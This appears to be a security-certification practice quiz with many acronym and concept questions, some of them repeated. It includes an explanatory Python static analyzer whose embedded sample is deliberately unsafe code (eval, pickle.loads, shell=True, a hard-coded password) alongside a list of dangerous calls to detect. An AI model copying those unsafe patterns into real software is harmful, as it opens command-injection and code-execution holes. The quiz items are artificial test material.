• RTO

• MTTF

• RPO

Which of the following defines the maximum acceptable amount of data loss measured by a specific
point in time before a disaster or outage?

• RPO

• MTBF

• RTO

• MTTR

Which of the terms listed below is used to describe the average time required to repair a failed
component or device?

• MTBF

• RPO

• MTTR

• SLA

A high MTBF value indicates that a component or system provides low reliability and is more likely to
fail.

• True

• False

A metric that represents the average amount of time a device or system is expected to operate before
experiencing its first failure is known as:

• MTTR

• SLA

• MTBR

• MTTF

Vulnerability scanning: (Select all that apply)

• Identifies lack of security controls

• Actively tests security controls

• Identifies common misconfigurations

• Exploits vulnerabilities
• Passively tests security controls

Which of the answers listed below refer to the characteristic features of static code analysis? (Select 3
answers)

• Involves examining the code without executing it

• Often used early in the development process

• Examines code structure, syntax, and semantics to detect issues like syntax errors, coding
standards violations, security vulnerabilities, and bugs

• Typically used later in the software development lifecycle

• Involves executing the code and analyzing its behavior at runtime

• Analyzes runtime properties like memory usage, performance, and error handling to identify
issues such as memory leaks, performance bottlenecks, and runtime errors

Which of the following statements describe the features of dynamic code analysis? (Select 3 answers)

• Typically used later in the software development lifecycle

• Involves examining the code without executing it

• Analyzes runtime properties like memory usage, performance, and error handling to identify
issues such as memory leaks, performance bottlenecks, and runtime errors

• Often used early in the development process

• Examines code structure, syntax, and semantics to detect issues like syntax errors, coding
standards violations, security vulnerabilities, and bugs

• Involves executing the code and analyzing its behavior at runtime
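
Static analysis, as the answer choices say, examines code structure without running it. The block below is an added example written for this page (not a tool the question set refers to): a minimal Python static analyzer built on the standard `ast` module that walks a syntax tree and flags dangerous calls (`eval`, `pickle.loads`, `subprocess.*` with `shell=True`) and string literals assigned to credential-looking names. The analysed `SAMPLE_SOURCE` is constructed and is never executed; the rule set is illustrative, not exhaustive.

```python
import ast

# Constructed sample under analysis. It is only parsed, never executed.
SAMPLE_SOURCE = '''\
import os, subprocess, pickle

DB_PASSWORD = "hunter2"

def run(cmd):
    return subprocess.run(cmd, shell=True)

def load(blob):
    return pickle.loads(blob)

def calc(expr):
    return eval(expr)

def safe(cmd):
    return subprocess.run(["ls", "-l", cmd])
'''

DANGEROUS_CALLS = {
    "eval": "eval() on attacker-controlled text is arbitrary code execution",
    "exec": "exec() on attacker-controlled text is arbitrary code execution",
    "pickle.loads": "unpickling untrusted data executes code",
    "os.system": "shell command assembled from strings; use subprocess with an argument list",
}
SECRET_WORDS = ("PASSWORD", "SECRET", "TOKEN", "API_KEY")


def _called_name(call: ast.Call):
    """'eval' for eval(...), 'pickle.loads' for pickle.loads(...), else None."""
    f = call.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return f"{f.value.id}.{f.attr}"
    return None


def _shell_true(call: ast.Call) -> bool:
    return any(kw.arg == "shell" and isinstance(kw.value, ast.Constant)
               and kw.value.value is True for kw in call.keywords)


def analyze(source: str):
    """Return (line, symbol, message) findings sorted by line number."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _called_name(node)
            if name in DANGEROUS_CALLS:
                findings.append((node.lineno, name, DANGEROUS_CALLS[name]))
            elif name and name.startswith("subprocess.") and _shell_true(node):
                findings.append((node.lineno, name,
                                 "shell=True lets shell metacharacters in the argument reach a shell"))
        elif isinstance(node, ast.Assign):
            literal = isinstance(node.value, ast.Constant) and isinstance(node.value.value, str)
            for target in node.targets:
                if (literal and isinstance(target, ast.Name)
                        and any(w in target.id.upper() for w in SECRET_WORDS)):
                    findings.append((node.lineno, target.id, "hard-coded credential in source"))
    return sorted(findings)
```

Running `analyze(SAMPLE_SOURCE)` reports lines 3, 6, 9 and 12 and stays silent on the list-form `subprocess.run` at the end. Because nothing executes, the tool cannot tell whether `expr` is ever attacker-controlled; that is the false-positive trade-off of static analysis that dynamic testing later in the lifecycle complements.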

Which of the terms listed below refers to tracking and managing software application components,
such as third-party libraries and other dependencies?

• Version control

• Package monitoring

• Configuration enforcement

• Application hardening

Which of the following terms refers to threat intelligence gathered from publicly available sources?

• IoC

• OSINT

• RFC

• CVE/NVD

Which of the terms listed below refers to a US government initiative for real-time sharing of cyber threat
indicators?

• AIS
• STIX

• TTP

• CVSS

What is STIX?

• A type of vulnerability database

• Common language for describing cyber threat information

• US government initiative for real-time sharing of cyber threat indicators

• Transport mechanism for cyber threat information

A dedicated transport mechanism for cyber threat information is called:

• TCP/IP

• TLS

• TAXII

• S/MIME

Which of the following provides insights into the methods and tools used by cybercriminals to carry out
attacks?

• CVE

• IoC

• AIS

• TTP

Which of the following statements does not apply to the dark web?

• Typically requires specialized software to access its contents

• Forms a large part of the deep web

• Not indexed by traditional search engines

• Often associated with trading stolen data, malware, and cyber threats

Penetration testing: (Select all that apply)

• Bypasses security controls

• Only identifies lack of security controls

• Actively tests security controls

• Exploits vulnerabilities

• Passively tests security controls

A responsible disclosure program is a formal process established by an organization to encourage
security researchers and ethical hackers to report vulnerabilities they discover in the organization's
systems or software. A bug bounty program is a specific type of responsible disclosure program that
offers financial rewards to security researchers for reporting valid vulnerabilities.

• True

• False

Antivirus software identifying a non-malicious file as a virus because of a faulty virus signature file is
an example of:

• Fault tolerance

• False positive error

• Quarantine feature

• False negative error

Which of the answers listed below refers to a situation where no alarm is raised when an attack has
taken place?

• False negative

• True positive

• False positive

• True negative

A measure of the likelihood that a security system will incorrectly reject an access attempt by an
authorized user is referred to as:

• FAR

• CER

• CRC

• FRR
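
The three questions above (false positive, false negative, FRR) share one vocabulary. The block below is an added example written for this page, not from the question set: a threshold sweep over constructed biometric match scores that computes FAR and FRR at each candidate threshold and finds the crossover error rate (CER), plus the four-way outcome mapping an IDS or antivirus uses. The score lists are made up so the crossover is exact; real data would give a "closest" rather than an equal point.

```python
# Constructed match scores in [0, 1]; higher means closer to the enrolled template.
GENUINE = [0.4, 0.5, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95]    # legitimate users
IMPOSTOR = [0.05, 0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.45, 0.55, 0.62]  # other people


def error_rates(genuine, impostor, threshold):
    """Accept a sample when score >= threshold.
    FRR: fraction of genuine users rejected (the system's false negatives).
    FAR: fraction of impostors accepted (the system's false positives)."""
    frr = sum(s < threshold for s in genuine) / len(genuine)
    far = sum(s >= threshold for s in impostor) / len(impostor)
    return far, frr


def crossover_error_rate(genuine, impostor):
    """Sweep every observed score as a threshold and return (threshold, FAR, FRR)
    where the two curves meet or come closest. Raising the threshold trades FAR
    for FRR; a lower CER means a more accurate system overall."""
    best = None
    for t in sorted(set(genuine) | set(impostor)):
        far, frr = error_rates(genuine, impostor, t)
        if best is None or abs(far - frr) < abs(best[1] - best[2]):
            best = (t, far, frr)
    return best


def alarm_outcome(attack_occurred: bool, alarm_raised: bool) -> str:
    """Detection-system vocabulary used in the questions above."""
    if attack_occurred and alarm_raised:
        return "true positive"
    if attack_occurred:
        return "false negative"   # the dangerous case: the attack goes unnoticed
    if alarm_raised:
        return "false positive"   # e.g. a clean file flagged by a bad signature
    return "true negative"
```

On the constructed data, `crossover_error_rate(GENUINE, IMPOSTOR)` returns `(0.55, 0.2, 0.2)`: at a threshold of 0.55, 20% of genuine users are turned away and 20% of impostors get in. Moving the threshold to 0.6 lowers FAR to 10% at the cost of a 20% FRR, which is the tuning decision every biometric or detection deployment has to make explicitly.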

Which of the following terms refers to a framework and knowledge base that provides understanding of
TTPs used during cyberattacks?

• CVSS

• ATT&CK

• STIX

• TAXII

Which of the answers listed below refers to an industry standard for assessing and scoring the severity
of computer system security vulnerabilities?

• SIEM

• CVSS

• OSINT

• SOAR
Which of the following refers to a system that identifies, defines, and catalogs publicly known
cybersecurity vulnerabilities?

• TAXII

• CVE

• STIX

• CVSS

What is Exposure Factor (EF) in vulnerability analysis?

• The likelihood that a vulnerability will be exploited in a real-world scenario

• The rate at which vulnerabilities are discovered and reported

• The degree of loss that a realized threat would have on a specific asset

• The measure of the potential impact of a vulnerability on an organization's assets

Which of the statements listed below does not refer to a vulnerability response and remediation
technique?

• Applying updates or fixes provided by software vendors to address the vulnerability (patching)

• Ensuring financial recovery from the costs associated with a successful cyberattack (insurance)

• Dividing a network into smaller, isolated zones to limit the potential impact of a vulnerability
(segmentation)

• Mitigating the risk associated with a vulnerability that cannot be immediately patched by
implementing alternative security measures (compensating controls)

• Delaying or forgoing a patch for a specific system, e.g., when applying a patch may not be
feasible due to compatibility issues or potential disruptions to critical systems (exceptions and
exemptions)

• All of the above answers are examples of vulnerability response and remediation techniques

Which of the following answers refers to a data storage device equipped with hardware-level
encryption functionality?

• HSM

• TPM

• EFS

• SED

Which of the answers listed below refers to software technology designed to provide confidentiality for
an entire data storage device?

• TPM

• FDE

• EFS
• HSM

An MS Windows component that enables encryption of individual files is called:

• SED

• EFS

• BitLocker

• FDE

Which of the following software application tools are specifically designed for implementing
encryption algorithms to secure data communication and storage? (Select 2 answers)

• VPN

• GPG

• SSH

• IPsec

• PGP

What is the name of a network protocol that secures web traffic via SSL/TLS encryption?

• SFTP

• HTTPS

• FTPS

• SHTTP

A network protocol that enables secure file transfer over SSH is known as:

• TFTP

• SFTP

• Telnet

• FTPS

SFTP is an extension of the FTP protocol that adds support for SSL/TLS encryption.

• True

• False

A type of cryptographic network protocol for secure data communication, remote command-line login,
remote command execution, and other secure network services between two networked computers is
called:

• RDP

• SSH

• Telnet
• SCP

Which part of IPsec provides authentication, integrity, and confidentiality?

• SPD

• PFS

• AH

• ESP

A system that uses public network (such as the Internet) as a means for creating private encrypted
connections between remote locations is referred to as:

• WWAN

• VPN

• PAN

• VLAN

Which protocol enables secure, real-time delivery of audio and video over an IP network?

• S/MIME

• RTP

• SIP

• SRTP

An encryption protocol primarily used in Wi-Fi networks implementing the WPA2 security standard is
known as:

• TKIP

• CCMP

• SSL

• IPsec

Which cryptographic protocol is designed to provide secure communications over a computer network
and is the successor to SSL?

• IPsec

• TLS

• AES

• CCMP

Examples of techniques used for encrypting information include symmetric encryption (also called
public-key encryption) and asymmetric encryption (also called secret-key encryption, or session-key
encryption).

• True
• False

In asymmetric encryption, any message encrypted with the use of a public key can only be decrypted
by applying the same algorithm and a matching private key (and vice versa).

• True

• False

Which of the algorithms listed below are not symmetric ciphers? (Select 3 answers)

• AES

• DES

• DHE

• ECC

• IDEA

• RC4

• RSA

Which of the following algorithms do(es) not fall into the category of asymmetric encryption? (Select all
that apply)

• AES

• DES

• DHE

• ECC

• IDEA

• RC4

• RSA

The term "KEK" refers to a type of cryptographic key often used in key management systems to add an
additional layer of security when encrypting and decrypting other cryptographic keys.

• True

• False

Which of the answers listed below refers to a protocol used to set up secure connections and
exchange of cryptographic keys in IPsec VPNs?

• SSL

• IKE

• ESP

• DHE

Which of the following answers refers to a key exchange protocol that generates temporary keys for
each session, providing forward secrecy to protect past and future communications?

• PFS

• SHA

• PGP

• DHE

Which of the answers listed below refers to a solution designed to strengthen the security of session
keys?

• ECB

• PFS

• EFS

• PFX

Which of the following answers refers to a cryptographic key exchange protocol that leverages ECC for
enhanced security and efficiency?

• S/MIME

• ECDHE

• DHE

• ECDSA

What is the name of a public-key cryptosystem that leverages the mathematical properties of large
prime numbers to facilitate secure key exchange, create digital signatures, and encrypt data?

• ECC

• RSA

• PKI

• DSA

Which cryptographic solution would be best suited for low-power devices, such as IoT devices,
embedded systems, and mobile devices?

• ECC

• DES

• RSA

• AES

Which of the cryptographic algorithms listed below is the least vulnerable to attacks?

• AES

• DES

• RC4

• 3DES

Which of the following answers refers to a deprecated (largely replaced by AES) symmetric-key block
cipher encryption algorithm?

• ECDSA

• RSA

• IDEA

• DSA

What is the recommended replacement for DES?

• DSA

• RSA

• RC4

• AES

An IV is a random or pseudorandom value used in cryptography to ensure that the same plaintext input
does not produce the same ciphertext output, even when the same encryption key is used. The IV is
typically used with encryption algorithms in block cipher modes to enhance security by introducing
randomness to the encryption process.

• True

• False

Which of the answers listed below refers to a logical operation commonly used in the context of
cybersecurity, particularly in encryption and obfuscation techniques?

• AND

• OR

• NOT

• XOR

Which of the following answers refers to a block cipher mode that works by chaining the ciphertext
blocks together, such that each ciphertext block depends on the previous block?

• CBC

• GCM

• ECB

• CFB

Which cipher mode transforms a block cipher into a stream cipher, enabling the encryption of
individual bits or bytes of data?

• CFB

• CBC

• GCM

• ECB

A block cipher mode that combines a unique counter with an encryption key to generate a stream of
pseudorandom data blocks, which are then used for encrypting data, is called:

• CBC

• GCM

• CFB

• CTM

Which of the block cipher modes listed below is the simplest/weakest and therefore not
recommended for use?

• CBC

• GCM

• ECB

• CTM

Which block cipher mode combines CTM for encryption with an authentication mechanism to ensure
both data confidentiality and integrity?

• CBC

• GCM

• ECB

• CFB

In cryptography, the number of bits in a key used by a cryptographic algorithm is referred to as key size
or key length. The key length determines the maximum number of combinations required to break the
encryption algorithm; therefore, a longer key typically means stronger cryptographic security.

• True

• False

Which AES key length provides the highest level of security?

• 128-bit key

• 192-bit key

• 256-bit key

• 320-bit key

Which of the following answers refers to a protocol used to set up secure connections and exchange of
cryptographic keys in IPsec VPNs?

• SSL

• IKE

• ESP

• DHE

An access control model that enforces the strictest set of access rules is known as:

• MAC

• RBAC

• DAC

• ABAC

Which of the acronyms listed below refers to a cryptographic software tool for secure email
communication and data protection?

• DES

• PEM

• EFS

• PGP

What type of action allows an attacker to exploit the XSS vulnerability?

• Code injection

• Banner grabbing

• PIN recovery

• Input validation

A type of vulnerability where the state of a resource is verified at one point in time but may change
before the resource is actually used is called:

• TOC

• TOC/TOU

• TOU

• TSIG

The term "SMS" is used in reference to:

• Text messaging services

• Enhanced messaging services

• Multimedia messaging services

• Rich communication services

Which of the following terms refers to a framework and knowledge base that provides understanding of
TTPs used during cyberattacks?

• CVSS

• ATT&CK

• TAXII

• STIX

Which of the answers listed below refers to a security solution that provides the capability for
detection, analysis, response, and real-time monitoring of cyber threats at the device level?

• SWG

• CASB

• EDR

• NGFW

Which of the following answers refers to a system containing mappings of domain names to various
types of data, such as numerical IP addresses?

• TCP/IP

• DNS

• SQL

• DHCP

The term "OTA" refers to the process of wirelessly transmitting data, updates, or information to
electronic devices, such as smartphones, tablets, or IoT devices, typically using cellular networks,
Wi-Fi, or other wireless communication methods.

• True

• False

Which of the acronyms listed below refers to a piece of hardware and associated software/firmware
designed to provide cryptographic and key management functions?

• EFS

• HSM

• SFC

• TPM

What is a PUP? (Select 3 answers)

• A type of computer program not explicitly classified as malware by AV software

• An application downloaded and installed without the user's consent

• A type of software that may adversely affect the computer's security and performance,
compromise user's privacy, or display unsolicited ads

• An application downloaded and installed with the user's consent

• A type of computer program explicitly classified as malware by AV applications

• A type of free, utility software often bundled with a paid app
A measure of the likelihood that a biometric security system will incorrectly reject an access attempt
by an authorized user is referred to as:

• FAR

• CER

• CRC

• FRR

Which of the following enables the automation of vulnerability scanning and compliance checking?

• SAML

• OVAL

• SCAP

• SASE

Which of the acronyms listed below refers to a comprehensive strategy and set of procedures
designed to ensure that an organization can continue its critical operations and functions during and
after a disruptive event?

• BIA

• SLE

• BCP

• BPA

Given the computational limitations of IoT devices, smartcards, and mobile devices, which of the
following digital signature algorithms would be the most efficient choice due to its smaller key size and
lower computational requirements?

• RSA

• ECDHE

• DSA

• ECDSA

• ECC

Which type of software is used to prevent, detect, and remove malware from computer systems and
networks?

• IDS

• SaaS

• AV

• WAF

An estimate based on the historical data of how often a threat would be successful in exploiting a
vulnerability is known as:

• ALE

• SLA

• ARO

• SLE

Which of the answers listed below refers to a rule-based access control mechanism associated with
files and/or directories?

• EFS

• FACL

• FIM

• NTFS

Which of the following answers refers to a DNS TXT record that allows the owner of a domain to specify
all the servers authorized to send mail from their domain?

• DKIM

• SRV

• CNAME

• SPF

Which of the answers listed below refers to a cryptographic method used to verify that a message or
data has remained unaltered during transmission and originates from an authorized source?

• MAC

• CBC

• PEM

• GCM

Which of the following answers refers to a network security technology designed to monitor WLANs for
unauthorized access, security threats, and suspicious activities?

• UTM

• WIDS

• NGFW

• WAF

Which of the acronyms listed below refers to a client-server protocol that provides centralized AAA
services for remote-access users?

• OAuth

• RADIUS

• LDAP

• OpenID

Which type of software enables centralized administration of mobile devices?

• MFA

• MMC

• MDM

• MFD

Which of the following defines a file format for storing and exchanging personal identity information,
including private keys and digital certificates?

• P10

• P11

• P12

• P13

Which of the answers listed below refers to a cryptographic key exchange protocol that leverages ECC
for enhanced security and efficiency?

• IKE

• ECDHE

• DHE

• ECDSA

The term "MTTF" refers to a metric that represents the average amount of time a device or system is
expected to operate before experiencing its first failure.

• True

• False

In modern OSs, this feature prevents malicious code from executing in certain memory regions
intended for data.

• DEP

• ECB

• DLP

• CRC

Which of the following enables the exchange of information between computer programs?

• API

• UI

• Device drivers

• SDK

A cloud computing service model offering remote access to applications based on a monthly or annual
subscription fee is called:

• PaaS

• SaaS

• IaaS

• DaaS

RTBH is a type of DDoS attack.

• True

• False

Which AES key length provides the highest level of security?

• 128-bit key

• 192-bit key

• 256-bit key

• 320-bit key

Which of the answers listed below refers to a specific type of ICS?

• SoC

• CVSS

• SCADA

• RTOS

The MIME specification extends the email message format beyond simple text, enabling the transfer of
graphics, audio, and video files over the Internet mail system. S/MIME is an enhanced version of the
MIME protocol that enables email security features by providing encryption, authentication, message
integrity, and other related services.

• True

• False

Which part of the IPsec protocol suite provides authentication and integrity?

• CRC

• AH

• SIEM

• AES

A detailed agreement between a client and a vendor describing the work to be performed on a project is
referred to as:

• MSA

• SLA

• WO

• SOW

Which of the following answers refers to an analog telephone service providing basic voice
communication over copper telephone lines?

• PSTN

• ISDN

• PBX

• POTS

A protocol designed to improve the security of existing WEP implementations is known as:

• SRTP

• TKIP

• CCMP

• WPA2

Which of the acronyms listed below refers to a technology used in cameras and surveillance systems
that enables remote control of camera functions?

• RDP

• CCTV

• PTZ

• TCP/IP

Which of the following devices would be used for connecting a router to a T1 line?

• CSU

• IDF

• NIC

• EDR

What are the applications of PGP? (Select 3 answers)

• Compressing data

• Encrypting and decrypting data

• Signing and verifying digital signatures

• Managing public and private keys

• Securing website traffic

A field in an SSL/TLS certificate that allows the certificate to be used for multiple domain names or IP
addresses is referred to as:

• CNAME

• SAN

• MX

• PTR

Which of the answers listed below refers to a tunneling protocol commonly used in creating VPNs?

• VRRP

• GRE

• RTSP

• BGP

Which of the following answers refers to a professional who oversees the management and
maintenance of an information repository?

• CTO

• PM

• DBA

• CIO

Which of the terms listed below refers to a US government initiative for real-time sharing of cyber threat
indicators?

• NVD

• AIS

• TTP

• CVSS

A type of OS characterized by low delay between the execution of tasks required in specific
applications, such as in military missile guidance systems or in automotive braking systems, is known
as:

• UNIX

• Windows NT

• POSIX

• RTOS

Which of the following block cipher modes is the simplest/weakest and therefore not recommended for
use?

• CBC

• GCM

• ECB

• CTR

Which communication method supports real-time text-based messaging, multimedia sharing, group
chats, and video calls?

• SMS

• MMS

• IM

• RTC

Which senior executive position assumes the responsibility for protecting assets, data, and people
from potential threats?

• CEO

• CIO

• CSO

• CTO

Which cybersecurity role is primarily responsible for hands-on implementation and oversight of
security measures for specific systems and networks?

• CSO

• CTO

• DPO

• ISSO

A company or organization that offers cloud computing services over the Internet is called:

• ISP

• MSSP

• CSP

• MSP

Which of the terms listed below refers to a global community focused around the development of
engineering standards?

• ANSI

• NIST

• CERT

• IEEE

Which of the following answers refers to a device designed to supply (and monitor the quality of)
electric power to multiple outlets?

• PSU

• MDF

• PDU

• IDF

Which of the answers listed below refers to a global standard development organization composed of
different national standards bodies?

• NIST

• ISO

• IEEE

• ANSI

Which of the following acronyms refers to the process of identifying and preparing for potential
disruptions or unexpected events to ensure business continuity?

• BIA

• SLE

• CP

• BPA

A dedicated local network consisting of devices providing data access is referred to as:

• SDN

• NAS

• iSCSI

• SAN

Which senior executive is responsible for managing an organization's IT strategy and systems?

• CEO

• CIO

• CSO

• CTO

Which of the answers listed below refers to a framework used on Unix-like OSs to manage
authentication-related tasks?

• PAM

• SSO

• MFA

• OAuth

Which of the following answers refers to a network protocol for delivering audio and video over IP
networks?

• RDP

• VoIP

• RTP

• UDP

Which of the terms listed below refers to a specialized suite of software tools used for developing
applications for a specific platform?

• GUI

• SDLC

• API

• SDK

A type of software that serves as an intermediary between users and the hardware, allowing users to
interact with the computer and run applications, is known as:

• ROM

• BIOS

• OS

• RAM

Which of the following answers refers to an encryption protocol primarily used in Wi-Fi networks
implementing the WPA2 security standard?

• TKIP

• CCMP

• SSL

• HMAC

In telecommunications, a type of main hub connecting internal networks with outside cabling is called:

• MDF

• ICS

• MDI

• IDF

Which of the acronyms listed below refers to a protocol used in network management systems for
monitoring network-attached devices?

• SSH

• VNC

• SNMP

• RDP

Which of the following answers refers to a routing protocol?

• RTP

• BGP

• RDP

• EAP

A specific URI type most commonly used to identify web pages is referred to as:

• DOI

• ISBN

• OUI

• URL

Which of the answers listed below refers to a solution that simplifies web browser configurations by
using predefined rules or scripts to make server selection decisions for specific web traffic?

• PAC

• DDNS

• PAM

• NAT

Which of the following terms refers to a network of physical devices, vehicles, buildings, and other
items embedded with sensors, software, and other technologies that connect and exchange data with
other devices and systems over the Internet?

• SoC

• PAN

• IoT

• WMN

Which of the answers listed below refers to a unique 32-bit identifier embedded in older mobile
phones and used by network operators to identify and authenticate the device on the cellular network?

• MAC

• ESN

• IP

• OID

Which of the following answers refers to a software-based solution that allows users to access and
interact with a virtual OS from anywhere using any device with an Internet connection?

• VDU

• VTC

• VDE

• VNC

Which of the acronyms listed below refers to a broader term used to describe an organization
responsible for responding to computer-related emergencies?

• CIRT

• CERN

• CERT

• CSIRT

Which of the following acronyms refers to a discontinued research program focused on promoting
innovation and development in the field of telecommunications and information technology?

• IETF

• CERN

• DARPA

• RACE

Which of the answers listed below refers to a team of experts within an organization focused on
responding to a wide variety of computer-related incidents?

• CERT

• CSIRT

• CIRT

• CERN

GPG is used for: (Select all that apply)

• Securing website traffic

• Managing public and private keys

• Signing and verifying digital signatures

• Compressing data

• Encrypting and decrypting data

A software system that integrates and manages various business processes and functions across an
organization is known as:

• BCP

• CMS

• ERP

• BIA

What is RIPEMD?

• Block cipher encryption mode

• Digital signature algorithm

• Family of cryptographic hash functions

• Symmetric encryption algorithm

Which of the following acronyms refers to a dedicated facility responsible for monitoring, detecting,
investigating, and responding to cybersecurity incidents?

• NOC

• C2

• ISAC

• SOC

Which of the following solutions would be best suited for a company that needs comprehensive IT
services but lacks qualified IT personnel?

• MSA

• MaaS

• MSP

• MSSP

Which of the terms listed below refers to a third-party vendor offering IT security management
services?

• MSP

• MaaS

• MSA

• MSSP

Which of the following acronyms refers to the broad category of hardware and software systems used
for monitoring and controlling physical devices, processes, and industrial operations?

• ICS

• OT

• SCADA

• EDR

Which of the answers listed below refers to a basic method for establishing a dedicated point-to-point
link between two networked devices?

• PPTP

• IGMP

• PPP

• MPLS

Which of the following defines the maximum acceptable amount of data loss measured by a specific
point in time before a disaster or outage?

• RPO

• MTBF

• RTO

• MTTR

Which of the terms listed below refers to a framework for managing access to digital resources?

• PAM

• SSO

• IAM

• MFA

Which of the following answers refer to SCAP? (Select 3 answers)

• A type of security system designed to collect logs and events from various sources

• Designed to provide a centralized user interface for accessing collected data

• A collection of standards developed by NIST

• Provides a common language for communicating security information

• Allows different security tools to share data and work together more effectively

• Enables real-time threat detection, incident response, and compliance monitoring

A Windows feature used for centrally managing and enforcing policies and settings for users and
computers in a network is referred to as:

• SAE

• NTLM

• GPO

• SSO

Which of the answers listed below refers to a protocol used for automating the issuance and
management of certificates within a PKI environment?

• PKCS

• SCEP

• CSR

• OCSP

Which of the following answers refer to the characteristic features of RSA? (Select 3 answers)

• Asymmetric encryption algorithm

• A public key used for encryption and a private key used for decryption

• Suitable for bulk data encryption

• Used for secure communications, digital signatures, and key exchange

• Symmetric encryption algorithm

• A single key used for both encryption and decryption

Which of the answers listed below describe the characteristics of a non-persistent VDI? (Select 2
answers)

• At the end of a session, user desktop reverts to its original state

• Each user runs their own copy of virtual desktop

• At the end of a session, user data and personal settings are saved

• Virtual desktop is shared among multiple users

Which of the following answers refers to an obsolete protocol used for secure data transfer over the
web?

• SMTPS

• SRTP

• SHTTP

• S/MIME

In a persistent VDI: (Select 2 answers)

• Each user runs their own copy of virtual desktop

• At the end of a session, user desktop reverts to its original state
• Virtual desktop is shared among multiple users

• At the end of a session, user data and personal settings are saved

An authentication mechanism that generates one-time passwords based on a counter value and a
secret key is known as:

• OAuth

• HOTP

• RADIUS

• TOTP

Which of the acronyms listed below refers to a documented process for addressing identified issues
and preventing their repetition?

• DRP

• COOP

• QA

• CAR

Which of the following answers refers to a software tool designed to simplify the process of creating
and maintaining online content?

• VDI

• SaaS

• CMS

• SDK

Which block cipher mode combines CTM for encryption with an authentication mechanism to ensure
both data confidentiality and integrity?

• CBC

• GCM

• ECB

• CFB

The term "FPGA" refers to a reconfigurable integrated circuit that can be programmed and customized
to perform various digital functions and tasks.

• True

• False

Which of the answers listed below refer to SIEM? (Select 3 answers)

• Allows different security tools to share data and work together more effectively

• Designed to provide a centralized user interface for accessing collected data
• A collection of standards developed by NIST

• Enables real-time threat detection, incident response, and compliance monitoring

• A type of security system designed to collect logs and events from various sources

• Provides a common language for communicating security information

Which of the following answers refers to a trusted third-party service for validating user identity in a
federated identity system?

• RA

• IdP

• CA

• Kerberos

Which of the answers listed below refers to a deprecated TLS-based method for securing SMTP?

• IDPS

• STARTTLS

• DKIM

• SMTPS

Which of the following enables running macros in Microsoft Office applications?

• DOM

• API

• DLL

• VBA

Which of the answers listed below refers to a language used to structure and describe data in a format
that is both human- and machine-readable?

• HTML

• XML

• JSON

• XHTML

In SNMP, each node in a MIB is uniquely identified by a(n):

• OID

• IP

• OUI

• MAC

Which of the following acronyms refers to a block cipher mode that works by chaining the ciphertext
blocks together, such that each ciphertext block depends on the previous block?

• CBC

• GCM

• ECB

• CFB

Which of the answers listed below refers to a dedicated protocol designed for enabling real-time
text-based communication over the Internet?

• IRC

• RTC

• IM

• MMS

A specialized electronic component that accelerates visual rendering is called:

• TPU

• GPU

• DSP

• CPU

Which of the following answers refers to a protocol that enables the exchange of messages and data
between applications running on different OSs and using different programming languages?

• VDE

• SOAP

• VDI

• SMTP

Which of the answers listed below refers to a deprecated MS Windows authentication protocol
replaced by Kerberos?

• PPTP

• WEP

• NTLM

• SNMPv2

Which of the following enables delivery of various data packet types over the same network link?

• LWAPP

• MPLS

• MLPPP

• MIBS

Which of the answers listed below refers to a Windows-specific feature for handling exceptions, errors,
and abnormal conditions in software?

• EPC

• SEH

• EH

• EXR

Which of the following acronyms refers to a security mechanism used in the DNS to authenticate and
secure communications between DNS servers during zone transfers and other transactions?

• SOA

• DKIM

• SPF

• TSIG

Which of the answers listed below refers to a cable rack that interconnects wiring between an MDF and
workstation devices?

• ICS

• MDI

• IDF

• MTU

Which of the following technologies enables automated handling of multiple security incidents?

• SOAP

• SIEM

• SOAR

• SASE

What is the name of a solution that increases the efficiency of IP address space management by
allowing network administrators to divide networks into subnets of different sizes?

• DNAT

• VLSM

• MPLS

• VLAN

What is the fastest way for checking the validity of a digital certificate?

• CRL

• OSPF

• CSR

• OCSP

Which of the terms listed below refers to a process of intercepting network traffic data for analysis and
troubleshooting purposes?

• AIS

• PCAP

• EDR

• MaaS

In a Kerberos-protected network, this type of secure token is granted to users during their initial login to
give them access to multiple network services without the need to re-enter their login information.

• OTP

• TGT

• AS

• TGS

Which of the following answers refers to a language primarily used for automating the assessment of
security vulnerabilities and configuration issues on computer systems?

• OVAL

• SAML

• XML

• SOAP

A remote access authentication protocol used primarily in Microsoft networks that periodically
re-authenticates the client at random intervals to prevent session hijacking is known as:

• PEAP

• MSCHAP

• LEAP

• CHAP

Which of the acronyms listed below refers to a formal and legally binding document that specifies
detailed terms, obligations, and responsibilities of all parties involved?

• SOW

• MOA

• MSA

• MOU

Which of the following answers refers to CSRF?
• A cyberattack in which an attacker intercepts and maliciously retransmits data or
authentication requests to gain unauthorized access or impersonate a legitimate user or system

• A type of malicious attack where unauthorized commands are transmitted from a user's
browser to a web application without their knowledge or consent, often leading to actions being
taken on their behalf

• A security vulnerability that allows attackers to inject malicious scripts into web pages viewed
by other users, potentially leading to data theft or manipulation

• A type of cyberattack where malicious code is injected into a web application's input fields to
manipulate the database and gain unauthorized access to data or perform malicious actions

ARP provides:

• IP-to-FQDN mapping

• MAC-to-IP mapping

• FQDN-to-IP mapping

• IP-to-MAC mapping

A set of procedures put in place to recover IT systems and data following a major disruption is called:

• DRP

• BIA

• SLE

• BCP

Which of the answers listed below refers to a network protocol used for synchronizing clocks over a
computer network?

• NTP

• VTP

• NNTP

• RTP

An integrated circuit combining components typically found in a standard computer system is referred
to as:

• HSM

• TPM

• SoC

• BIOS

Which of the following acronyms refers to a document that authorizes, initiates, and tracks the
progress and completion of a particular job or task?

• SOW

• WO

• SLA

• MSA

Which of the answers listed below refers to a protocol used by routers, hosts, and network devices to
generate error messages and troubleshoot problems with delivery of IP packets?

• CCMP

• RSTP

• ICMP

• SNMP

Which of the following terms refer to the characteristic features of DSL? (Select 3 answers)

• Leased lines

• Copper cabling

• Telephone lines

• Fiber-optic cabling

• Last mile solutions

• WAN links

A type of trusted third party that issues digital certificates used for creating digital signatures and
public-private key pairs is known as:

• RA

• IKE

• CA

• CSP

Which of the answers listed below refers to a mobile device deployment model that allows employees
to use private mobile devices for accessing a company's restricted data and applications?

• COPE

• BYOD

• JBOD

• CYOD

What is the name of a U.S. government initiative providing a set of procedures and plans that an
organization can implement to ensure continued performance of its essential functions during
unexpected events?

• SLA

• COOP

• RPO

• BCP

Which of the following answers refers to a policy framework that allows domain owners to specify how
email receivers should handle emails that fail authentication checks?

• DKIM

• SPF

• PGP

• DMARC

Which of the answers listed below refers to a deprecated wireless authentication protocol developed
by Cisco?

• PEAP

